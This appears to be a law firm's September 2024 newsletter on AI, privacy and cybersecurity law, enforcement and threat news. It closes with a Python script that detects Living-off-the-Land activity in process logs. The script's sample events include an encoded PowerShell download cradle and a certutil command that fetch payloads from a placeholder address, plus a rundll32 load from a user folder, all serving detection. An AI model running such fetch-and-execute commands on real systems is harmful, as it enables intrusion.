
Right To Know - September 2024, Vol. 21

September 17, 2024

Cyber, Privacy, and Technology Report

 

Welcome to your monthly rundown of all things cyber, privacy, and technology, where we highlight all the happenings you may have missed.

View previous issues and sign up to receive future newsletters by email here. 

 

State Action:  

  • Illinois Regulates Use of AI In Employment Decisions: On August 9, Illinois Governor J.B. Pritzker signed an amendment to the Illinois Human Rights Act that addresses the use of artificial intelligence in employment decisions. Under the amendments, which become effective January 1, 2026, artificial intelligence includes not only machine-based systems that can make predictions, recommendations, or decisions, but also “Generative Artificial Intelligence,” such as computing systems that respond to human prompts with simulated “human-produced content.” Employers that utilize artificial intelligence in connection with “recruitment, hiring, promotion, renewal of employment, selection for training or apprenticeship, discharge, discipline, tenure, or the terms, privileges, or conditions of employment” will be required to provide notice to employees about the use of AI. Additionally, the amendments prohibit using AI that has the effect of discriminating against protected classes in employment decisions and prohibit the use of “zip codes as a proxy for protected classes” under the Act. The Illinois Department of Human Rights is charged with promulgating rules to implement and enforce the amendments.
  • New York Attorney General Continues Focus on Consumer Rights: The New York Attorney General has published two new guidance documents focused on the privacy of consumer data and online tracking. These documents, a Business Guide to Website Privacy Controls and a Consumer Guide to Tracking on the Web, seek to provide businesses guidance on compliance with New York privacy laws and provide consumers tips on protecting their information while online. This is a continuation of the OAG’s focus on consumer protections and could signal a need for businesses that have an online presence to look more closely at their compliance with New York privacy laws, including whether the cookie banners and opt-out controls on their sites actually do what they say.
  • California Legislature Passes Controversial Artificial Intelligence Bill: On August 28, 2024, the California legislature passed a controversial artificial intelligence safety bill. The bill would require developers of artificial intelligence models that cost more than $100 million to develop, or that require a defined amount of computing power to train (and those providing that computing power), to implement appropriate safeguards and policies to prevent defined critical harms, including the capability to completely shut down the model. The bill would establish a state entity to oversee the development of artificial intelligence models and calls for the creation of a consortium to develop a framework for a public cloud computing cluster. It would also grant the California Attorney General the power to sue if developers are not compliant, particularly in the event of an ongoing threat to public safety. The bill also requires developers to hire third-party auditors to assess their safety practices and provides additional protections to whistleblowers speaking out against abuses of artificial intelligence. The bill now heads to Governor Gavin Newsom, who has until September 30 to decide whether to sign it into law or veto it.
  • Illinois Amends its Biometric Information Privacy Act: On August 2, 2024, Illinois amended its Biometric Information Privacy Act (BIPA), expressly limiting liability to a single violation per individual, regardless of the number of biometric scans, as long as the scans are collected in the same manner. This amendment addresses the ruling of the Illinois Supreme Court in Cothron v. White Castle System, Inc., which held that damages accrue every time an entity collects an individual’s biometric data. The amendment also recognizes electronic signatures as valid written consent for collecting and sharing biometric data.

Regulatory:  

  • SEC Amendments to Regulation S-P Now in Effect: The amendments to Regulation S-P took effect on August 2, 2024; larger covered institutions have 18 months from the amendments’ publication in the Federal Register to comply and smaller ones 24 months. The amendments apply to broker-dealers, investment companies, registered investment advisers, and transfer agents. Key provisions require covered institutions to develop, implement, and maintain written policies and procedures for an incident response program that is reasonably designed to detect, respond to, and recover from unauthorized access to or use of customer information, and to notify affected individuals whose sensitive customer information was, or is reasonably likely to have been, accessed or used without authorization as soon as practicable and no later than 30 days after becoming aware of the incident. Because the 30-day clock runs from awareness, the incident response program should define who makes the awareness determination and when.
  • CISA Opens Incident Reporting Portal: On August 29, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) announced that its cyber incident reporting form has moved to its new CISA Services Portal, a secure platform with enhanced functionality for cyber incident reporting and updating. Reporting is voluntary for now but will become mandatory for some businesses and organizations when regulations under the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) become final. Under the current Proposed Rule, CIRCIA would require covered critical infrastructure entities to report substantial cyber incidents to CISA within 72 hours and ransom payments within 24 hours of making them. The law requires CISA to issue a final rule by October 2025. CISA encourages voluntary reporting of cyber incidents (until mandatory requirements take effect, and for entities and events for which reporting is not mandatory) and has provided a Voluntary Cyber Incident Reporting Resource. (Links to the Portal and Resource are included in CISA’s News Release.) Businesses and organizations should understand these requirements and build CISA reporting (especially where mandatory) into their incident response plans, including who is authorized to submit a report and where the 72-hour and 24-hour clocks start.
  • HHS OCR Announces a $115,200 Civil Monetary Penalty for Failure to Provide Timely Access to Patient Records: On August 1, 2024, the U.S. Department of Health and Human Services (“HHS”) Office for Civil Rights (“OCR”) announced its latest enforcement action under the Right of Access initiative. American Medical Response (“AMR”), a provider of emergency medical services across the United States, agreed to pay a civil monetary penalty of $115,200 after OCR received a complaint that AMR provided a patient with access to their medical records only after four requests, and 370 days after the initial request. The settlement marks OCR’s 49th enforcement action relating to individuals being given timely access (within 30 days, with the possibility of one 30-day extension) to their health information.

Litigation & Enforcement:  

  • Texas Continues Privacy Enforcement – Sues GM and OnStar: On August 13, 2024, Attorney General Ken Paxton filed suit on behalf of the State of Texas against General Motors and its subsidiary OnStar. According to the lawsuit, GM used telematics systems installed in its 2015 and later vehicles to capture data on its customers’ driving habits, including speed, seat belt usage, travel direction, driving time, and location-related information. Texas claims that GM “aggressively” sought to have its customers sign up for various products and applications that captured this data, by claiming that the products would improve their experience and safety with the vehicle, but failed to properly disclose the collection of the information or its use. The State further alleges that GM sold some or all of the data to various companies, including insurance-related companies and data brokers that would resell it. The lawsuit claims violations of the Texas Deceptive Trade Practices Act.
  • Illinois Federal Court Examines GIPA Claims: Judge Sharon Coleman of the United States District Court for the Northern District of Illinois issued two of the first federal decisions applying a substantive analysis to some of the key provisions of the Illinois Genetic Information Privacy Act (GIPA) in the employment context. The pair of cases arose out of allegations that the defendant employers required the plaintiff employees to undergo a pre-employment medical examination during which they were asked about their family medical history. The plaintiffs claimed, and the court agreed on a motion to dismiss, that such questions could constitute requests for genetic information prohibited under the statute. The court examined numerous issues including the extraterritoriality of GIPA and statute of limitations concerns. Clark Hill issued a detailed alert on these cases.
  • Law Firm Loses Funds Wired to Client: Nagel Rice, a New Jersey personal injury firm, filed a lawsuit against TD Bank for losses stemming from a check fraud scam. The suit was originally filed in July but was removed to federal court in New Jersey this week. Nagel Rice alleges that TD Bank failed to detect and warn about a cashier’s check issued by BBVA Bank. The suit alleges that BBVA Bank has a history of issuing fraudulent checks and that TD Bank had knowledge of it. Nagel Rice received a cashier’s check in the amount of $148,950.00 from a “purported client” drawn on BBVA on November 23, 2020. According to the complaint, on that same day, Nagel Rice attempted to deposit the cashier’s check in its account with TD Bank. Two days later, on November 25, 2020, Nagel Rice alleges it wired $146,250.00 from its account at TD Bank to the purported client’s bank account. On December 1, 2020, Nagel Rice claims it received a letter via regular mail dated November 25, 2020, from TD Bank advising it, for the first time, that the cashier’s check had bounced. That same day, Nagel Rice’s office manager spoke with an employee of TD Bank who allegedly admitted that TD Bank had received many prior fraudulent checks drawn on BBVA. Nagel Rice sued TD Bank under theories of negligence and breach of contract. TD Bank has yet to respond to the plaintiff’s allegations. The sequence is the standard counterfeit cashier’s check pattern: the deposit is provisionally credited and the outbound wire leaves before the check is actually returned, so a control that holds disbursements of client funds until the underlying instrument has cleared is the practical defense.
  • SEC Charges Equiniti Trust Co. with Failing to Protect Client Funds from Cyber Attacks: The SEC has settled its investigation into cybersecurity failings at securities transfer agent Equiniti, formerly American Stock Transfer & Trust Company, for $850,000. The SEC alleged that Equiniti had insufficient safeguards in place, which allowed two separate cyber attacks to occur and resulted in the loss of $6.6 million of client funds. The first attack stemmed from a business email compromise that allowed a threat actor to impersonate an employee of an issuer and request that millions of new shares be issued and liquidated, with the proceeds transferred to a Hong Kong bank. Despite warnings to its employees to be alert to fraudulent wire transfer requests, the company followed the instructions without conducting additional checks, such as calling back the issuer on a known number. The other incident stemmed from the creation of fraudulent accounts using legitimate Social Security numbers. Equiniti linked the fraudulent accounts to the legitimate accounts, allowing the threat actors to access and liquidate client assets and then transfer the proceeds to themselves. Equiniti was able to recover some of the lost funds and reimbursed its clients for any shortfall.
  • U.S. Department of Justice Joins Lawsuit Against Georgia Tech Alleging Cybersecurity Violations: On August 28, 2024, the U.S. Department of Justice (DOJ) announced that it had filed a complaint-in-intervention to join United States ex rel. Craig v. Georgia Tech Research Corp., et al., a whistleblower case alleging that Georgia Tech knowingly violated cybersecurity requirements for defense contracts. The lawsuit alleges that Georgia Tech (1) failed to develop and implement a system security plan, (2) failed to properly scope the plan when it belatedly implemented it, (3) failed to install, update or run anti-virus or anti-malware tools on desktops, laptops, servers and networks at a lab, in order to satisfy the demands of the professor who headed the lab, and (4) submitted a false cybersecurity assessment score to the Department of Defense. The whistleblower action was filed by two former senior members of Georgia Tech’s cybersecurity compliance team. The intervention was brought under DOJ’s Civil Cyber-Fraud Initiative, announced on October 6, 2021, which is designed to hold accountable entities or individuals that put U.S. information or systems at risk through knowing violations of cybersecurity, monitoring, and reporting requirements.
  • T-Mobile Fined $60 Million Over Security Issues: The Committee on Foreign Investment in the United States (CFIUS) has fined T-Mobile $60 million, which is the largest in CFIUS’ history. The fine came after CFIUS found that “T-Mobile failed to take appropriate measures to prevent unauthorized access to certain sensitive data and failed to report some incidents of unauthorized access promptly to CFIUS, delaying efforts to investigate and mitigate any potential harm.” The fine’s severity was also based on T-Mobile’s delay in reporting the security incident.
  • HHS OCR Files Notice of Appeal In Response to the United States District Court for the Northern District of Texas’s Decision in Online Tracking Technologies Case: On August 19, 2024, the US Department of Health and Human Services (HHS) Office for Civil Rights (OCR) filed a notice of appeal of the United States District Court for the Northern District of Texas’s June 20, 2024, decision in American Hospital Association, et al. v. Xavier Becerra, et al. In that case, the court held that OCR exceeded its authority in a bulletin concerning HIPAA’s application to cookies and other online tracking technologies on HIPAA-regulated entities’ webpages that are publicly available and do not require users to log in before they can access the page. The notice of appeal does not set out the arguments OCR will make before the Fifth Circuit; until the appeal is resolved, the bulletin’s treatment of unauthenticated webpages remains vacated as to the plaintiffs.

International Updates:

  • Privacy Notice Generator for SMEs issued by U.K. Information Commissioner’s Office: On August 20, 2024, the U.K. Information Commissioner’s Office officially launched its Privacy Notice Generator. The Generator creates two different types of notices: one for organizations to use with customers, and the other for use with staff members and volunteers. The Generator is designed to ease compliance and notification burdens for U.K.-based small and medium-sized enterprises. It replaces the previous Word document-based template and is one component of the Information Commissioner’s Office’s plan to streamline some of its key services.
  • Dutch Data Protection Authority fines Uber €290 Million: Autoriteit Persoonsgegevens, the Dutch Data Protection Authority (“DDPA”), has imposed a fine of €290 million on Uber due to transfers of Uber drivers’ personal data outside of the European Union. The DDPA launched an investigation into Uber following more than 170 complaints from French Uber drivers to the French human rights group Ligue des droits de l’Homme. The complaints were then forwarded to the DDPA as Lead Supervisory Authority for Uber. The DDPA investigation concluded that there had been a breach of Article 44 of the General Data Protection Regulation, which governs transfers of personal data to third countries, and imposed the fine on Uber.
  • October Will be the 21st Annual Cybersecurity Awareness Month: October will be the 21st Annual Cybersecurity Awareness Month cosponsored by the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA). It’s “a dedicated month for the public and private sectors to work together to raise awareness about the importance of cybersecurity.” The theme is “Secure Our World,” which will be a continuing theme for future years. This year’s campaign focuses on four basic actions to stay safe online at home, work, and school: (1) Recognize and Report Phishing, (2) Use Strong Passwords (and Password Managers), (3) Turn on MFA (Multifactor Authentication), and (4) Update Software. CISA and NCA have prepared a Toolkit that businesses and organizations can use for campaigns for the month tailored to their employees. The Toolkit can also be helpful for reviewing and updating cybersecurity awareness and training programs.
  • Ireland’s Cybersecurity Centre publishes National Emergency Plan: The National Cyber Security Centre (NCSC) of Ireland has published its National Cyber Emergency Plan. Developed after various exercises and the lessons learned from the 2021 ransomware attack on the Health Service Executive (HSE), the plan sets out critical thresholds for declaration of a national cyber emergency, as well as strategies for management, response, and the allocation of accountabilities. Notably, the threshold for a “cyber emergency” is defined as, among other circumstances, any cyber incident causing or threatening to cause death or serious injury or damage to property or the economy. The response plan calls for various modes of escalating response up to a “full activation mode” requiring activation of the National Emergency Coordination Group.

Industry Updates:  

  • NSA Issues Joint Guidance with Allies on Event Logging: Cybersecurity adversaries increasingly rely on techniques that leverage native, legitimate tools already present on the victim’s network. These techniques, commonly referred to as Living off the Land (“LOTL”), are difficult to detect because the binaries involved (PowerShell, certutil, rundll32, WMI and similar) are exactly what a defender expects to see. On August 21, 2024, the National Security Agency (“NSA”), together with CISA, the FBI and international partners led by the Australian Signals Directorate’s Australian Cyber Security Centre, published Best Practices for Event Logging and Threat Detection. The guidance sets out how to maximize a defender’s ability to detect and respond to LOTL activity: adopt an enterprise-wide logging policy that captures high-value events such as process creation with the full command line and parent process, centralize logs and protect their integrity, retain them long enough to support an investigation, and baseline normal activity so that anomalous use of built-in tools stands out.
  • Iranian Government Hackers Acting as Initial Access Brokers for Ransomware Gangs: On August 28, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) issued a joint advisory alerting network defenders that Iranian government actors were acting as initial access brokers for ransomware gangs. The Iranian threat actors are targeting victims in the education, finance, healthcare and defense sectors and, once access to the victim network has been established, are handing that access to ransomware groups to exploit. CISA also advises reviewing its guidance on Iranian state-sponsored cyber attacks.
  • Hackers Claim to Have Stolen Sensitive Data from U.S. Marshals Service: The hacking group Hunters International says it has stolen more than 380 gigabytes of data from the U.S. Marshals Service (“USMS”). Screenshots of the stolen records, which include confidential information about gangs, active cases, and electronic surveillance, were posted to the group’s leak site. USMS experienced a ransomware attack in February of 2023 which took down its network for over 10 weeks. At that time, the USMS did not disclose whether any data was stolen, nor did it acknowledge paying a ransom. USMS spokesperson Brady McCarron has said that USMS “has evaluated the materials posted by individuals on the dark web, which do not appear to derive from any new or undisclosed incident.” Hunters International operates as a ransomware-as-a-service operation, in which the group leases its ransomware tooling to affiliates in exchange for a share of the profits from successful attacks.
  • Halliburton Confirms Cyber Attack: In a Form 8-K SEC filing, Halliburton, a major oilfield services company, confirmed that an “unauthorized third party gained access to certain systems.” The incident marks a continued threat to the energy sector. While Halliburton has not reported any impact to services, the Department of Energy remains engaged when energy-sector companies experience reportable cybersecurity incidents.
  • Guilty Plea for Owners of One-Time Passcode Theft Service: Three men in the United Kingdom pleaded guilty to operating a website that allowed criminals to evade multi-factor authentication and access credit card verification sites. Provided as a subscription, the service charged criminals a monthly fee of £30 for the basic level and £380 for premium. The service helped subscribers socially engineer bank account holders into disclosing their one-time passcode or other personal information and then complete fraudulent transactions. The case is a reminder that one-time codes delivered by SMS, voice or authenticator app remain phishable in real time; phishing-resistant methods such as FIDO2/WebAuthn passkeys bind the authentication to the genuine site and leave the user no code to disclose.
  • Ransomware Season Arrives Early, According to a New Report by Corvus Insurance: Corvus Insurance’s Q2 2024 Cyber Threat Report reveals a significant rise in ransomware activity, with 1,248 victims identified, marking the second-highest number in a single quarter. New ransomware groups emerged following the takedown of prominent gangs, driving a 16% increase in attacks compared to Q1 2024. The report highlights a surge in ransomware demands and payouts, with average demands reaching over $1.5 million, a 102% increase from the previous quarter. The study also emphasizes the growing prevalence of double-extortion tactics, with data theft involved in 93% of incidents, and notes the construction industry as the most frequently targeted sector in Q2, with significant increases in attacks on the IT Services and Consulting sectors.
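The practical point of the event-logging guidance above is that LOTL activity only becomes visible when process-creation events carry the full command line and parent process, and when those events are collected centrally so unusual use of built-in binaries can be picked out against a baseline. As an added illustration (not code from the guidance, the NSA, or this newsletter), the Python below runs a handful of such rules over constructed events normalized to the fields a SIEM would extract from Windows Security event 4688 or Sysmon event 1. The hosts, paths, the 203.0.113.5 address and the encoded PowerShell payload are all invented, and the rules are deliberately minimal; a production detection would also consider user context, signing status and frequency across the fleet.

```python
"""Flag Living-off-the-Land activity in process-creation telemetry.

Added example; not code from the event-logging guidance, the NSA, or this
newsletter. It assumes events already normalised to dicts with host, parent,
image and cmdline keys, as a SIEM would produce from Windows Security event
4688 or Sysmon event 1. All sample events below are constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Parent/child pairings and argument patterns that are rare in normal use but
# routine in LOTL tradecraft. Built-in binaries are not suspicious on their
# own; the context in which they run is what a detection has to reason about.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"^(?:c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\)",
                           re.IGNORECASE)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell expects base64 over the UTF-16LE encoding of the script, so a
    detection that only matches on the flag never sees what was actually run.
    """
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events) -> list:
    """Run each rule over every event and collect the findings."""
    findings = []
    for ev in events:
        host = ev["host"]
        parent = (ev.get("parent") or "").lower()
        image = (ev.get("image") or "").lower()
        cmd = ev.get("cmdline") or ""
        if not cmd:
            # Without command-line capture none of the argument-based rules
            # can fire; collecting it is the guidance's first recommendation.
            findings.append(Finding(host, "no_cmdline",
                                    f"{image}: command line not logged"))
            continue
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append(Finding(host, "office_spawns_script_host",
                                    f"{parent} -> {image}"))
        if image == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
            findings.append(Finding(host, "certutil_download_or_decode", cmd))
        if image == "rundll32.exe":
            arg = cmd.split(None, 1)[1] if " " in cmd else ""
            if USER_WRITABLE.match(arg):
                findings.append(Finding(host, "rundll32_user_writable_dll", arg))
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append(Finding(host, "powershell_encoded_command",
                                        decoded))
    return findings


def _enc(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects (sample data only)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events: hosts and paths are invented and 203.0.113.5 is
# from a documentation-only address range.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r"notepad.exe C:\Users\jdoe\notes.txt"},
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p.ps1')")},
    {"host": "srv02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws03", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.exe"},
    {"host": "ws03", "parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\x.dll,Start"},
    {"host": "ws04", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -store my"},          # legitimate admin use
    {"host": "ws05", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": None},                              # command-line logging off
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.rule:30} {f.detail}")
```

Run stand-alone it prints five findings: the Word-spawned PowerShell event fires twice (parent/child pairing and the decoded download cradle), the certutil download and the rundll32 load from a user-writable path each fire once, and the ws05 event fires only the no_cmdline rule, which is the guidance's point in miniature: with command-line logging switched off, that certutil invocation is indistinguishable from the legitimate one on ws04.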

This publication is intended for general informational purposes only and does not constitute legal advice or a solicitation to provide legal services. The information in this publication is not intended to create, and receipt of it does not constitute, a lawyer-client relationship. Readers should not act upon this information without seeking professional legal counsel. The views and opinions expressed herein represent those of the individual author only and are not necessarily the views of Clark Hill PLC. Although we attempt to ensure that postings on our website are complete, accurate, and up to date, we assume no responsibility for their completeness, accuracy, or timeliness.
